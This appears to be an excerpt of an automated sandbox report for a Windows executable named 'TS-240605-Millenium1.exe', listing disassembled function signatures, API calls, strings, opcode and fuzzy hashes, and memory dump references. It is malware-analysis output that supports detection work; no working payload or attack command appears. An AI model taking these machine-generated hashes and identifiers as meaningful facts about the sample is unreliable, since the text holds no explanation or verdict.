                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: verbose
                                                                                          • API String ID: 3215553584-579935070
                                                                                          • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                          • Instruction ID: 05de1792a2b09616eb2fc68e61b524bb7e0560be72fbd169c4215102cf5c8c5d
                                                                                          • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                          • Instruction Fuzzy Hash: 0991D322A08A4742FB21DE25D65237D37B1EB62B66F844132EAC9D73D9EE3CE4458740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                          • API String ID: 3215553584-1196891531
                                                                                          • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                          • Instruction ID: d47f0e3de11f63d2917938d372dc51bdc2b9a07db43eb29ee859a63ad1a9fdb3
                                                                                          • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                          • Instruction Fuzzy Hash: CF816232D08602C5F6655F29C3506783AB0AB33B4AF558436EA89F7696DF3DF4059703
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 2395640692-1018135373
                                                                                          • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                          • Instruction ID: 4d0c6218dc4d166d3f76aa8a55f7c7603499c9ab372271aa13f99e6d5637f4e1
                                                                                          • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                          • Instruction Fuzzy Hash: 8051A122B196028AEB14CF15E558A7973B1EF75B86F108131FA8997798DF7DE841C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallEncodePointerTranslator
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 3544855599-2084237596
                                                                                          • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                          • Instruction ID: bd220364769b69a7822ae447923ea07d2cf455e9f0c37635468dcd56f218b5a5
                                                                                          • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                          • Instruction Fuzzy Hash: 5B619032908B8581E7219F15E5453A9B7A0FBA6795F044225EBDCA7B59CF3CD190CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3896166516-3733052814
                                                                                          • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                          • Instruction ID: 200dc33a51c5e046cfa6f85df305903cf34161e8854cd0abfdb2cb811b933123
                                                                                          • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                          • Instruction Fuzzy Hash: 7B519D3290828286EB248F15964927977B0FF76B86F144236EACDB7BD5CF3CE4518B01
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                          • API String ID: 1878133881-2410924014
                                                                                          • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                          • Instruction ID: f2f0c22937fc5f34b98a2473ff58f4f172538c47995d44a63af826b820219771
                                                                                          • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                          • Instruction Fuzzy Hash: 1A31857262868281E620DF10E5516FAA374FFA5BC5F844036F6CDA7A99DF3CD605CB40
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A
                                                                                          • CreateFileW.KERNEL32(00000000,?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243A8
                                                                                          • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243C8
                                                                                          • CloseHandle.KERNEL32(?,?,00007FF6CEB23FB9,?,00007FF6CEB239CA), ref: 00007FF6CEB243D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                                                          • String ID: \\?\
                                                                                          • API String ID: 2226452419-4282027825
                                                                                          • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                          • Instruction ID: 991eb7f15a2a12c30f94f16cb76a24187fed8522a6d70698a4cacd04e766b6a6
                                                                                          • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                          • Instruction Fuzzy Hash: 4021D562B0869245E620DF21F5443B9A261EFA57D5F440132EF9D93B94DF3CD548CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                          • String ID:
                                                                                          • API String ID: 2718003287-0
                                                                                          • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                          • Instruction ID: 70ac83346e5dc870156f27a1002dd8e638ba15253af5fab6d64597fe7315286a
                                                                                          • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                          • Instruction Fuzzy Hash: 33D11276B08A418AE711CF65C6402FC37B1FB66799B144236EF9DA7B99DE38D406C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                          • String ID:
                                                                                          • API String ID: 2780335769-0
                                                                                          • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                          • Instruction ID: e741881e36f4da3c8181a7610da9dad25153d742af4f1670b870094ea6a79839
                                                                                          • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                          • Instruction Fuzzy Hash: 8C51A122E08A428AF710DF71DA413BD33B1AB66B69F105535EE8DA768ADF38D5508740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                          • String ID:
                                                                                          • API String ID: 1956198572-0
                                                                                          • Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                          • Instruction ID: 5a777cbd47421da1a4206677880bbb477760c862110c5e337d7042ff351dcc0b
                                                                                          • Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                          • Instruction Fuzzy Hash: E811A921E1854246FB549F69F7482B91271EFBABC2F44C031FAC9D6B99CD3CE4C58600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                          • String ID: ?
                                                                                          • API String ID: 1286766494-1684325040
                                                                                          • Opcode ID: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                                                          • Instruction ID: a587596732f40aa6a3c93a710417873630e9d6e3e2778f3a335a7e2dd71db133
                                                                                          • Opcode Fuzzy Hash: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                                                          • Instruction Fuzzy Hash: D041F712A0874746FB249F25D64237A6670EBA2BA5F144236FEDC97ADDDE3CD441C700
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB39DFA
                                                                                            • Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
                                                                                            • Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6CEB2C335), ref: 00007FF6CEB39E18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                          • String ID: C:\Users\user\Desktop\TS-240605-Millenium1.exe
                                                                                          • API String ID: 2553983749-1758221888
                                                                                          • Opcode ID: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                                                          • Instruction ID: 419cc07af485af3e94b05d5b5ac49117ce59871570be8e4d52832dd283b6210b
                                                                                          • Opcode Fuzzy Hash: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                                                          • Instruction Fuzzy Hash: C8419236A08B1286EB14DF25A6820B863B4EF567D5F545036FACEE7B89DE3CE4418340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID: U
                                                                                          • API String ID: 442123175-4171548499
                                                                                          • Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                          • Instruction ID: 7e9f3fbb1f33194b99cd8a7c30ca7888e99f9a0567924394095c2da4bc652ce2
                                                                                          • Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                          • Instruction Fuzzy Hash: 4141B132A18A4286DB208F65E5453BA6770FBA9785F444031EE8DD7798EF3CD545CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID: :
                                                                                          • API String ID: 1611563598-336475711
                                                                                          • Opcode ID: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                                                          • Instruction ID: fb621ac8880259b64b515eb5f7497b99c8facd556366ced9e9711e60932acf82
                                                                                          • Opcode Fuzzy Hash: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                                                          • Instruction Fuzzy Hash: 3521E472B0868282FB209F11D54427E73B2FBA5B45F458036FACDA3684DF7CE9448B51
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: Error detected
                                                                                          • API String ID: 1878133881-3513342764
                                                                                          • Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                          • Instruction ID: f2b0f73656092aa50857438d3688e61cbd6381cbf876bced7261bcd0ee67e612
                                                                                          • Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                          • Instruction Fuzzy Hash: BA216072628A8291EB20DF10E5516FAA374FFA5785F801136FACDA7A59DF3CD205CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: Fatal error detected
                                                                                          • API String ID: 1878133881-4025702859
                                                                                          • Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                          • Instruction ID: 0e612e120db8560623fd15990ff66036f44d363f7210e2540d4824a24565bf99
                                                                                          • Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                          • Instruction Fuzzy Hash: B621747262868281E720DF10E5556FAA374FFA5785F801136F6CDA7A59DF3CD205CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                          • String ID: csm
                                                                                          • API String ID: 2573137834-1018135373
                                                                                          • Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                          • Instruction ID: 4750086462ad0d85395d214ea229a9029b73720c174d9e612aafed1093ab2149
                                                                                          • Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                          • Instruction Fuzzy Hash: 8B115B32608B8582EB208F15F60026977F1FB99B95F284231EACD57B69DF3CD551CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                          • String ID: :
                                                                                          • API String ID: 2595371189-336475711
                                                                                          • Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                          • Instruction ID: fbd8935f0c35b50a04276e3dbe7a0ba3c228081bb370e2368de154e3b5ca7418
                                                                                          • Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                          • Instruction Fuzzy Hash: E101D422E1C20382F720AF6095522BE63B0EF66749F841036F5CDE6285EF2CE5049B14

                                                                                          Execution Graph

                                                                                          Execution Coverage:1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0.9%
